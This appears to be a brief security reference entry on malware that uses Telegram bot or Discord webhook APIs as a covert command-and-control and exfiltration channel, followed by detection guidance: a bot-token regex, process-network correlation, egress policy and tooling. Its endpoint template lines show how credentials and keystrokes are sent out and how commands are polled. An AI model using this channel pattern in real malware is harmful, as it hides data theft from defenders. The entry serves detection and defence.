Messaging App C2
Using a legitimate messaging platform's bot or webhook API as the command-and-control channel, so traffic blends into normal traffic to a popular, rarely-blocked cloud service.
Standing up and maintaining dedicated C2 infrastructure is expensive and gives defenders a domain/IP to block. An easier alternative is to route commands and exfiltrated data through a platform that is already trusted, already encrypted in transit, and already allowed through most corporate egress policies: a chat app's own bot or webhook API.
How it works
A malware operator creates a bot (Telegram) or webhook (Discord) ahead of time and embeds its token in the sample. From there, the malware's "C2 protocol" is just that platform's ordinary API:
POST https://api.telegram.org/bot<token>/sendMessage ; exfil / beacon
GET https://api.telegram.org/bot<token>/getUpdates ; poll for commandsResults (screenshots, credentials, keystrokes) are sent the same way, often
as file uploads via the platform's own media-upload endpoint. Because the
destination is api.telegram.org or discord.com — domains an enormous
number of legitimate users and even legitimate corporate integrations talk to
— network defenses that allowlist popular SaaS domains rather than
inspecting content will simply never flag it, and no attacker-controlled
domain ever needs to be registered or protected from takedown.
Detection & analysis
- Static — A hard-coded bot token (Telegram tokens have a recognisable
\d+:[A-Za-z0-9_-]{35}shape) or webhook URL in a sample's strings is an extremely reliable static indicator, since legitimate software rarely embeds a fixed, single-purpose bot credential. - Dynamic — The traffic itself is TLS to a legitimate, widely-used
domain, so payload inspection is a dead end; the signal is instead
process-to-destination mismatch — a process with no plausible reason
to talk to
api.telegram.org/discord.com(e.g. not a browser, not a known chat client) doing so repeatedly on a beacon-like interval. - Policy discussion — This technique is a direct argument for application-aware egress control rather than domain allowlisting alone: if a security stack trusts any traffic to a popular SaaS domain by default, this class of C2 is close to invisible to it.
- Tools — TLS SNI/JA3 fingerprinting to flag non-browser clients talking to messaging-platform domains, EDR process-network correlation, YARA/string scanning for bot-token patterns during static triage.